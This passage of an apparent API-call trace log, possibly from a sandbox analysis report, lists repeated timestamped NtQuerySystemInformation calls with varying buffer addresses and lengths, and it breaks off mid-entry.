(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe610, Length=0x28, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x28, ResultLength=0x0) [0295.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x28, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe530, Length=0x20, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4b0, Length=0x20, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4b0, Length=0x20, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4b0, Length=0x20, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5f0, Length=0x20, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0295.971] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe850, Length=0x58, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5a0, Length=0x28, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe610, Length=0x28, ResultLength=0x0) [0295.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x28, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe690, Length=0x28, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.979] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5f0, Length=0x20, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x20, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe770, Length=0x38, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5f0, Length=0x20, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe580, Length=0x20, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe850, Length=0x58, ResultLength=0x0) [0295.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.982] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x28, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x28, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x28, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe570, Length=0x28, ResultLength=0x0) [0295.987] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5e0, Length=0x28, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.988] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe660, Length=0x28, ResultLength=0x0) [0295.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe660, Length=0x28, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe4d0, Length=0x20, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe450, Length=0x20, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe450, Length=0x20, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe450, Length=0x20, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe6a0, Length=0x20, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5c0, Length=0x20, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe540, Length=0x20, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe540, Length=0x20, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe540, Length=0x20, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5c0, Length=0x20, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe540, Length=0x20, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe540, Length=0x20, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe540, Length=0x20, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe730, Length=0x38, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe5c0, Length=0x20, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe550, Length=0x20, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe550, Length=0x20, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69feab8, Length=0x50, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe9e0, Length=0x38, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe810, Length=0x28, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe810, Length=0x28, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0295.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe810, Length=0x28, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe810, Length=0x28, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe880, Length=0x28, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe9e0, Length=0x38, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe900, Length=0x28, ResultLength=0x0) [0296.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.003] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe900, Length=0x28, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe9e0, Length=0x38, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x20, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7e0, Length=0x20, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7e0, Length=0x20, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7e0, Length=0x20, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe9e0, Length=0x38, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe860, Length=0x20, ResultLength=0x0) [0296.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7f0, Length=0x20, ResultLength=0x0) [0300.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.757] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe7f0, Length=0x20, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe960, Length=0x50, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0300.758] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fe890, 